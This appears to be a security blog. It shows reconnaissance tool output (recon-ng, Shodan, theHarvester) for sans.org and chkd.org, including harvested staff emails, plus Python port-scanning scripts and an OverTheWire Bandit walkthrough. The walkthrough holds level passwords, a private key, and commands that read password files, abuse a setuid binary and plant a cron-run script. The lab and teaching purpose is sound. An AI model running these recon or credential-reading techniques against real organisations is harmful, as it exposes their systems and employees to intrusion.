[*] [host] files.sans.org (<blank>)
[*] [host] labs.sans.org (<blank>)
[*] [host] www.sans.org (<blank>)
[*] [host] cyber-defense.sans.org (<blank>)
[*] [host] redmine.sans.org (<blank>)
[*] [host] securingthehuman.sans.org (<blank>)
[*] [host] software-security.sans.org (<blank>)
[*] [host] lists.sans.org (<blank>)
[*] [host] access.sans.org (<blank>)
[*] [host] digital-forensics.sans.org (<blank>)
[*] [host] sic.sans.org (<blank>)
[*] [host] uk.sans.org (<blank>)
[*] [host] ics.sans.org (<blank>)
[*] [host] pen-testing.sans.org (<blank>)
[*] [host] qms.sans.org (<blank>)
[*] [host] handlers.sans.org (<blank>)
[*] Sleeping to avoid lockout...

Now lets check out any new hosts added to the database.

[recon-ng][demo][bing_domain_web] > show hosts

 +---------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +---------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
 | 5 | redmine.sans.org | | | | | | bing_domain_web |
 | 6 | securingthehuman.sans.org | | | | | | bing_domain_web |
 | 7 | software-security.sans.org | | | | | | bing_domain_web |
 | 8 | lists.sans.org | | | | | | bing_domain_web |

(cropped for brevity)

Let’s try a different module then take another look at the hosts.

[recon-ng][demo][bing_domain_web] > search shodan
[*] Searching for 'shodan'...

 Recon
 -----
 recon/domains-hosts/shodan_hostname
 recon/hosts-ports/shodan_ip
 recon/locations-pushpins/shodan
 recon/netblocks-hosts/shodan_net

[recon-ng][demo][bing_domain_web] > use recon/domains-hosts/shodan_hostname
[recon-ng][demo][shodan_hostname] > run

--------
SANS.ORG
--------
[*] Searching Shodan API for: hostname:sans.org
[*] [port] 204.51.94.14 (25/<blank>) - smtp31b.sans.org
[*] [host] smtp31b.sans.org (204.51.94.14)
[*] [port] 66.35.59.19 (80/<blank>) - web23a.den.sans.org
[*] [host] web23a.den.sans.org (66.35.59.19)
[*] [port] 66.35.59.8 (53/<blank>) - dns21b.sans.org
[*] [host] dns21b.sans.org (66.35.59.8)
(cropped for brevity)

[recon-ng][demo][shodan_hostname] > show hosts

 +--------------------------------------------------------------------------------------------------------------------+
 | rowid | host | ip_address | region | country | latitude | longitude | module |
 +--------------------------------------------------------------------------------------------------------------------+
 | 1 | files.sans.org | | | | | | bing_domain_web |
 | 2 | labs.sans.org | | | | | | bing_domain_web |
 | 3 | www.sans.org | | | | | | bing_domain_web |
 | 4 | cyber-defense.sans.org | | | | | | bing_domain_web |
(cropped for brevity)
   42 | smtp31b.sans.org | 204.51.94.14 | | | | | shodan_hostname |
 | 43 | web23a.den.sans.org | 66.35.59.19 | | | | | shodan_hostname |
 | 44 | dns21b.sans.org | 66.35.59.8 | | | | | shodan_hostname |
 | 45 | admin.sans.org | 204.51.94.215 | | | | | shodan_hostname |
 | 46 | 204-51-94-246.clp.sans.org | 204.51.94.246 | | | | | shodan_hostname |
 | 47 | labs.sans.org | 204.51.94.233 | | | | | shodan_hostname |


Theharvester

The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database.
This tool is intended to help Penetration testers in the early stages of the penetration test in order to understand the customer footprint on the Internet. It is also useful for anyone that wants to know what an attacker can see about their organization. Source: https://code.google.com/p/theharvester/

┌─[kali]─[~]
└──> theharvester -d chkd.org -b all -e chsext1.chkd.org

*******************************************************************
* *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* TheHarvester Ver. 2.7 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
*******************************************************************


Full harvest..
[-] Searching in Google..
 Searching 0 results...
 Searching 100 results...
[-] Searching in PGP Key server..
[-] Searching in Bing..
 Searching 50 results...
 Searching 100 results...
[-] Searching in Exalead..
 Searching 50 results...
 Searching 100 results...
 Searching 150 results...


[+] Emails found:
------------------
+john.harrington@chkd.org
ASampson@chkd.org
Amy.Sampson@chkd.org
Amy@chkd.org
Barbara.Benson@chkd.org
Beach@chkd.org
Beverly.Jacobson@chkd.org
(cropped for brevity)
[+] Hosts found in search engines:
------------------------------------
[-] Resolving hostnames IPs... 
92.242.140.21:2Fwww.chkd.org
208.255.163.169:apihrp.chkd.org
157.21.35.200:kdmedia.chkd.org
208.255.163.168:mekids.chkd.org
208.255.163.189:webmail.chkd.org
208.255.163.163:www.chkd.org
[+] Virtual hosts:
==================
208.255.163.169 apihrp.chkd.org
157.21.35.200 kdmedia.chkd.org
208.255.163.189 webmail.chkd.org
208.255.163.163 www.chkd.org
208.255.163.163 208.255.163.163

Network-tools.com

This site offers a number of web-based tools, including:

Express
Ping
Trace
Whois (IDN Conversion Tool)
DNS Records (Advanced Tool)
Network Lookup
Spam Blacklist Check
URL Decode
URL Encode
HTTP Headers SSL
Email Tests

One of the tools I find useful on this site is the Network Lookup. Enter an IP address or domain name and it will show the network address/range which is useful for finding IP address ranges owned by the target to include in active scans. This is the output of checking “Network Lookup” on www.sans.org.

NetRange: 66.35.59.0 - 66.35.59.255
CIDR: 66.35.59.0/24

Netcraft Toolbar

http://toolbar.netcraft.com/site_report

This site is useful to see what technology a website is running.

SiteDigger

http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx

SiteDigger 3.0 searches Google’s cache to look for vulnerabilities, errors, configuration issues, proprietary information, and interesting security nuggets on web sites.

sitedigger

Shodan.io

https://www.shodan.io/

The search engine for the Internet of Things

Think of Shodan as a search engine that returns results that include the banner of a site or device. Want to find open vulnerable sites, VNC servers, IoT devices, webcams that don’t require authentication and allow you to waste hours of your day? You can also use shodan to generate a list of target IP addresses, export the list, and import into your security tool of choice.

You can find a free guide to Shodan on exploit-db.com:  https://www.exploit-db.com/docs/33859.pdf

Maltego

Maltego Community Edition is pre-installed in Kali Linux.

Maltego is an interactive data mining tool that renders directed graphs for link analysis. The tool is used in online investigations for finding relationships between pieces of information from various sources located on the Internet. Maltego uses the idea of transforms to automate the process of querying different data sources. This information is then displayed on a node based graph suited for performing link analysis.

Currently there are three versions of the Maltego client namely Maltego CE, Maltego Classic and Maltego XL. This page will focus on Maltego Community Edition (CE). All three Maltego clients come with access to a library of standard transforms for the discovery of data from a wide range of public sources that are commonly used in online investigations and digital forensics.

Port scan and grab banners in Python

Just a simple port scanner and banner grabber written in Python. I made it because I didn’t have admin privs to install nmap at the time because I was a new employee < 90 days and I wanted to sharpen my Python skills and find out if that port was open.

The instructions are simple. Just run “python simpleportscanner.py” and it will prompt for an IP address. It scans for specific tcp ports as is. Edit the code to scan the ports you desire or enter ports on the cli.

#!/usr/bin/env python
import socket
from multiprocessing.dummy import Pool as ThreadPool
import sys
from datetime import datetime

# Clear the screen
# subprocess.call('cls', shell=True)

# Ask for input
remoteServer = raw_input("Enter a remote host to scan: ")
remoteServerIP = socket.gethostbyname(remoteServer)

# Print a nice banner with information on which host we are about to scan
print "-" * 60
print "Please wait, scanning remote host", remoteServerIP
print "-" * 60

# Check what time the scan started
t1 = datetime.now()

def scan(ports):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    result = sock.connect_ex((remoteServerIP, ports))
    if result == 0:
        byte = str.encode("Server:\r\n")
        sock.send(byte)
        banner = sock.recv(1024)
        print "Port {}: Open".format(ports), " - ", banner
    sock.close()

# function to be mapped over
def scanParallel(ports, threads=4):
    pool = ThreadPool(threads)
    results = pool.map(scan, ports)
    pool.close()
    pool.join()
    return results

if __name__ == "__main__":
    ports =(20,21,22,23,53,69,80,88,110,123,135,137,138,139,143,161,389,443,445,464,512,513,631,860,1080,1433,1434,3124,3128,3306,3389,5800,5900,8080,10000)
    results = scanParallel(ports, 4)

   # Checking the time again
   t2 = datetime.now()

   # Calculates the difference of time, to see how long it took to run the  script
   total = t2 - t1

   # Printing the information to screen
   print 'Scanning Completed in: ', total

Get the code: https://raw.githubusercontent.com/sdcampbell/simpleportscanner/master/simpleportscanner.py

Bounce Scan Python Script

I was giving a presentation on Passive Information Gathering this week to the 757 White Hat Hacker meetup group that I organize. I found this website, yougetsignal.com that allows you to scan a limited range of ports on your internet gateway IP address, or specify an IP address and port to scan.

The hacker in me thought about how I could use this to perform passive reconnaissance. I’m always looking for a reason to solve a problem or save some time using Python, and this seemed like a good excuse to brush up on my Python web request skills. Sure, this may not be very useful to some. For me it’s an excuse to learn Python web requests. Feel free to use it and suggest improvements on my github page. Don’t be too harsh, I know there are a lot of things I can improve in this script. This is just something I whipped up quickly before breakfast this morning.

The http request captured by Burp Suite:

youscanrequest

The code:

#!/usr/bin/env python

# Import our libraries
import sys
import requests
from bs4 import BeautifulSoup

# Get the IP address from the command line
ipAddress = sys.argv[1]
# Self-explanatory
url = "http://ports.yougetsignal.com/short-scan.php"
# Our post value
values = {"remoteAddress":ipAddress}
# Do the post
r = requests.post(url, data=values)
# Use BeautifulSoup to parse html
soup = BeautifulSoup(r.content, 'html.parser')
# Strip html out and print text
print(soup.get_text())

The result of scanning 8.8.8.8:

C:\Users\sdcam\Documents>python bounce-scan.py 8.8.8.8
 Port 21 is closed on 8.8.8.8.
 Port 22 is closed on 8.8.8.8.
 Port 23 is closed on 8.8.8.8.
 Port 25 is closed on 8.8.8.8.
 Port 53 is open on 8.8.8.8.
 Port 80 is closed on 8.8.8.8.
 Port 110 is closed on 8.8.8.8.
 Port 115 is closed on 8.8.8.8.
 Port 135 is closed on 8.8.8.8.
 Port 139 is closed on 8.8.8.8.
 Port 143 is closed on 8.8.8.8.
 Port 194 is closed on 8.8.8.8.
 Port 443 is closed on 8.8.8.8.
 Port 445 is closed on 8.8.8.8.
 Port 1433 is closed on 8.8.8.8.
 Port 3306 is closed on 8.8.8.8.
 Port 3389 is closed on 8.8.8.8.
 Port 5632 is closed on 8.8.8.8.
 Port 5900 is closed on 8.8.8.8.
 Port 6112 is closed on 8.8.8.8.

My first Capture the Flag

I participated in my first CTF at Bsides Raleigh last week. I had an awesome time and placed 4th out of 23 teams despite losing more than half of the competition time while watching conference presentations, and competing solo. I was really surprised to receive a prize for 4th place. I got a Software Defined Radio (SDR) USB device. I jokingly said that they must have felt sorry for the old guy competing in his first CTF and dug a prize out of their personal stash. 🙂

20161020_231411_1024

 

OverTheWire Bandit

I’m always looking for a new challenge. OverTheWire Bandit ctf tests Linux and Bash scripting skills to solve security challenges. There are 27 levels.

Level 0 to 1

The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1.

The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH to log into that level and continue the game.

To get the password you simply had to cat the readme file.

bandit0@melinda:~$ ls
readme
bandit0@melinda:~$ cat readme
boJ9jbbUNNfktd78OOpsqOltutMc3MY1


Level 1 to 2

The password for the next level is stored in a file called – located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

There are different ways of accomplishing the same task in Bash:

bandit1@melinda:~$ cat `find . -name ‘-‘ -print`
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name ‘-‘ -exec cat {} +
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ find . -name ‘-‘ | xargs cat
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$ cat $(find . -name ‘-‘)
CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
bandit1@melinda:~$


Level 2 to 3

The password for the next level is stored in a file called spaces in this filename located in the home directory.
Commands you may need to solve this level: ls, cd, cat, file, du, find

bandit2@melinda:~$ cat spaces\ in\ this\ filename
UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK


Level 3 to 4

The password for the next level is stored in a hidden file in the inhere directory.

The ‘-a’ option to the ‘ls’ command shows hidden files. Files are hidden when the name is preceded by a period.

bandit3@melinda:~$ ls -al inhere
total 12
drwxr-xr-x 2 root root 4096 Nov 14 2014 .
drwxr-xr-x 3 root root 4096 Nov 14 2014 ..
-rw-r—– 1 bandit4 bandit3 33 Nov 14 2014 .hidden
bandit3@melinda:~$ cat inhere/.hidden
pIwrPrtPN36QITSp3EQaw936yaFoFgAB


Level 4 to 5

The password for the next level is stored in the only human-readable file in the inhere directory. Tip: if your terminal is messed up, try the “reset” command.

bandit4@melinda:~/inhere$ file ./* | grep text
./-file07: ASCII text
bandit4@melinda:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh


Level 5 to 6

The password for the next level is stored in a file somewhere under the inhere directory and has all of the following properties: – human-readable – 1033 bytes in size – not executable.

bandit5@melinda:~$ cd inhere/
bandit5@melinda:~/inhere$ find . -type f -size 1033c ! -executable | xargs file | grep text | cut -d “:” -f 1 | xargs -I % sh -c “echo % ; cat %”
./maybehere07/.file2
DXjZPULLxYr17uwoI01bNLQbtFemEgo7


Level 6 to 7

The password for the next level is stored somewhere on the server and has all of the following properties: – owned by user bandit7 – owned by group bandit6 – 33 bytes in size.

bandit6@melinda:~$ find / -user bandit7 -group bandit6 -size 33c 2>/dev/null | xargs -I % sh -c “echo % ; cat %”
/var/lib/dpkg/info/bandit7.password
HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs


Level 7 to 8

The password for the next level is stored in the file data.txt next to the word millionth.

bandit7@melinda:~$ cat data.txt | grep millionth
millionth cvX2JJa4CFALtqS87jk27qwqGhBM9plV


Level 8 to 9

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once.

bandit8@melinda:~$ sort data.txt | uniq –count | grep “1 ”
1 UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR


Level 9 to 10

The password for the next level is stored in the file data.txt in one of the few human-readable strings, beginning with several ‘=’ characters.

bandit9@melinda:~$ strings data.txt | grep “^=\+”
========== password
========== ism
========== truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk


Level 10 to 11

The password for the next level is stored in the file data.txt, which contains base64 encoded data.

bandit10@melinda:~$ cat data.txt | base64 -d
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR


Level 11 to 12

The password for the next level is stored in the file data.txt, where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions.

bandit11@melinda:~$ cat data.txt | tr ‘A-Za-z’ ‘N-ZA-Mn-za-m’
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu
bandit11@melinda:~$
bandit11@melinda:~$ cat data.txt | python -c ‘import sys; print sys.stdin.read().decode(“rot13”)’
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu


Level 12 to 13

The password for the next level is stored in the file data.txt, which is a hexdump of a file that has been repeatedly compressed. For this level it may be useful to create a directory under /tmp in which you can work using mkdir. For example: mkdir /tmp/myname123. Then copy the datafile using cp, and rename it using mv (read the manpages!).

bandit12@melinda:~$ ls
data.txt
bandit12@melinda:~$ mkdir /tmp/123
bandit12@melinda:~$ cp data.txt /tmp/123
bandit12@melinda:~$ cd /tmp/123
bandit12@melinda:/tmp/123$ ls
data.txt
bandit12@melinda:/tmp/123$ xxd -r data.txt > file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was “data2.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv file file.bz2
bandit12@melinda:/tmp/123$ bzip2 -d file.bz2
bandit12@melinda:/tmp/123$ ls
data.txt file
bandit12@melinda:/tmp/123$ file file
file: gzip compressed data, was “data4.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv file file.gz
bandit12@melinda:/tmp/123$ ls
data.txt file.gz
bandit12@melinda:/tmp/123$ gzip -d file.gz
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ mv data6.bin data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6.bz2 file
bandit12@melinda:/tmp/123$ bzip2 -d data6.bz2
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 file
bandit12@melinda:/tmp/123$ ls -l
total 48
-rw-r—– 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data5.bin
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6
-rw-rw-r– 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file file
file: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf file
data5.bin
bandit12@melinda:/tmp/123$ file data5.bin
data5.bin: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data5.bin
data6.bin
bandit12@melinda:/tmp/123$ file data6.bin
data6.bin: bzip2 compressed data, block size = 900k
bandit12@melinda:/tmp/123$ bzip -d data6.bin
-bash: bzip: command not found
bandit12@melinda:/tmp/123$ bzip2 -d data6.bin
bzip2: Can’t guess original name for data6.bin — using data6.bin.out
bandit12@melinda:/tmp/123$ file data6.bin.out
data6.bin.out: POSIX tar archive (GNU)
bandit12@melinda:/tmp/123$ tar -xvf data6.bin.out
data8.bin
bandit12@melinda:/tmp/123$ file data8.bin
data8.bin: gzip compressed data, was “data9.bin”, from Unix, last modified: Fri Nov 14 10:32:20 2014, max compression
bandit12@melinda:/tmp/123$ mv data8.bin data8.gz
bandit12@melinda:/tmp/123$ gzip -d data8.bin
gzip: data8.bin.gz: No such file or directory
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8.gz file
bandit12@melinda:/tmp/123$ gzip -d data8.gz
bandit12@melinda:/tmp/123$ ls
data.txt data5.bin data6 data6.bin.out data8 file
bandit12@melinda:/tmp/123$ ls -l
total 64
-rw-r—– 1 bandit12 bandit12 2546 Sep 21 09:40 data.txt
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data5.bin
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6
-rw-r–r– 1 bandit12 bandit12 10240 Nov 14 2014 data6.bin.out
-rw-r–r– 1 bandit12 bandit12 49 Nov 14 2014 data8
-rw-rw-r– 1 bandit12 bandit12 20480 Sep 21 09:43 file
bandit12@melinda:/tmp/123$ file data8
data8: ASCII text
bandit12@melinda:/tmp/123$ cat data8
The password is 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL


Level 13 to 14

The password for the next level is stored in /etc/bandit_pass/bandit14 and can only be read by user bandit14. For this level, you don’t get the next password, but you get a private SSH key that can be used to log into the next level. Note: localhost is a hostname that refers to the machine you are working on

bandit13@melinda:~$ ls
sshkey.private
bandit13@melinda:~$ ls -l /etc/bandit_pass/bandit14
-r——– 1 bandit14 bandit14 33 Nov 14 2014 /etc/bandit_pass/bandit14
bandit13@melinda:~$
bandit13@melinda:~$ ssh -i ./sshkey.private bandit14@localhost

bandit14@melinda:~$ cat /etc/bandit_pass/bandit14
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e


Level 14 to 15

The password for the next level can be retrieved by submitting the password of the current level to port 30000 on localhost.

bandit14@melinda:~$ echo 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e | nc localhost 30000
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr


Level 15 to 16

The password for the next level can be retrieved by submitting the password of the current level to port 30001 on localhost using SSL encryption.

bandit15@melinda:~$ openssl s_client -quiet -connect 127.0.0.1:30001
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd


Level 16 to 17

The credentials for the next level can be retrieved by submitting the password of the current level to a port on localhost in the range 31000 to 32000. First find out which of these ports have a server listening on them. Then find out which of those speak SSL and which don’t. There is only 1 server that will give the next credentials, the others will simply send back to you whatever you send to it.

bandit16@melinda:~$ openssl s_client -quiet -connect localhost:31790
depth=0 CN = li190-250.members.linode.com
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = li190-250.members.linode.com
verify return:1
cluFn7wTiGryunymYOu4RcffSxQluehd
Correct!
—–BEGIN RSA PRIVATE KEY—–
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6Lzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1O4f7HVm6EpTscdDxU+bCXWkfjuRb7Dy9GOtt9JPsX8MBTakzh3
vBgsyi/sN3RqRBcGU40fOoZyfAMT8s1m/uYv52O6IgeuZ/ujbjY=
—–END RSA PRIVATE KEY—–


Level 17 to 18

There are 2 files in the homedirectory: passwords.old and passwords.new. The password for the next level is in passwords.new and is the only line that has been changed between passwords.old and passwords.new

NOTE: if you have solved this level and see ‘Byebye!’ when trying to log into bandit18, this is related to the next level, bandit19

Save the cert above to cert.cer.

steve@steve-nuc:~$ chmod 400 cert.cer
steve@steve-nuc:~$ ssh -i cert.cer bandit17@bandit.labs.overthewire.org

bandit17@melinda:~$ diff passwords.old passwords.new
42c42
< BS8bqB1kqkinKJjuxL6k072Qq9NRwQpR

> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd


Level 18 to 19

The password for the next level is stored in a file readme in the homedirectory. Unfortunately, someone has modified .bashrc to log you out when you log in with SSH.

steve@steve-nuc:~$ scp bandit18@bandit.labs.overthewire.org:readme ~
bandit18@bandit.labs.overthewire.org’s password:
readme 100% 33 0.0KB/s 00:00
steve@steve-nuc:~$ cat readme
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x


Level 19 to 20

To gain access to the next level, you should use the setuid binary in the homedirectory. Execute it without arguments to find out how to use it. The password for this level can be found in the usual place (/etc/bandit_pass), after you have used to setuid binary.

bandit19@melinda:~$ ls -l
total 8
-rwsr-x— 1 bandit20 bandit19 7370 Nov 14 2014 bandit20-do
bandit19@melinda:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j


Level 20 to 21

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: To beat this level, you need to login twice: once to run the setuid command, and once to start a network daemon to which the setuid will connect.

NOTE 2: Try connecting to your own network daemon to see if it works as you think

In the first ssh session:
bandit20@melinda:~$ nc -lvp 65535 < /etc/bandit_pass/bandit20
Listening on [0.0.0.0] (family 0, port 65535)

In the second ssh session:
bandit20@melinda:~$ ./suconnect 65535

Back in the first ssh session it has sent us the password:
Connection from [127.0.0.1] port 65535 [tcp/*] accepted (family 2, sport 42398)
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr


Level 21 to 22

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

bandit21@melinda:~$ ls /etc/cron.d
behemoth4_cleanup leviathan5_cleanup natas25_cleanup~ semtex0-ppc
cron-apt manpage3_resetpw_job natas26_cleanup semtex5
cronjob_bandit22 melinda-stats natas27_cleanup sysstat
cronjob_bandit23 natas-session-toucher php5 vortex0
cronjob_bandit24 natas-stats semtex0-32 vortex20
cronjob_bandit24_root natas25_cleanup semtex0-64
bandit21@melinda:~$ cat /etc/cron.d/cronjob_bandit22
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
bandit21@melinda:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
bandit21@melinda:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI


Level 22 to 23

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

andit22@melinda:~$ cat /etc/cron.d/cronjob_bandit23
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh &> /dev/null
bandit22@melinda:~$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ‘ ‘ -f 1)

echo “Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget”

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ sh /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@melinda:~$ echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@melinda:~$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n


Level 23 to 24

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

bandit23@melinda:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo “Executing and deleting all scripts in /var/spool/$myname:”
for i in * .*;
do
if [ “$i” != “.” -a “$i” != “..” ];
then
echo “Handling $i”
timeout -s 9 60 “./$i”
rm -f “./$i”
fi
done

Find a writable location since my previous attempts to output the password to a file in /tmp were deleted:
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

Directory /run/lock looks good. Created my script there:
bandit23@melinda:~$ cat /run/lock/bandit24pwd.sh
#!/bin/sh
cat /etc/bandit_pass/bandit24 >> /run/lock/password

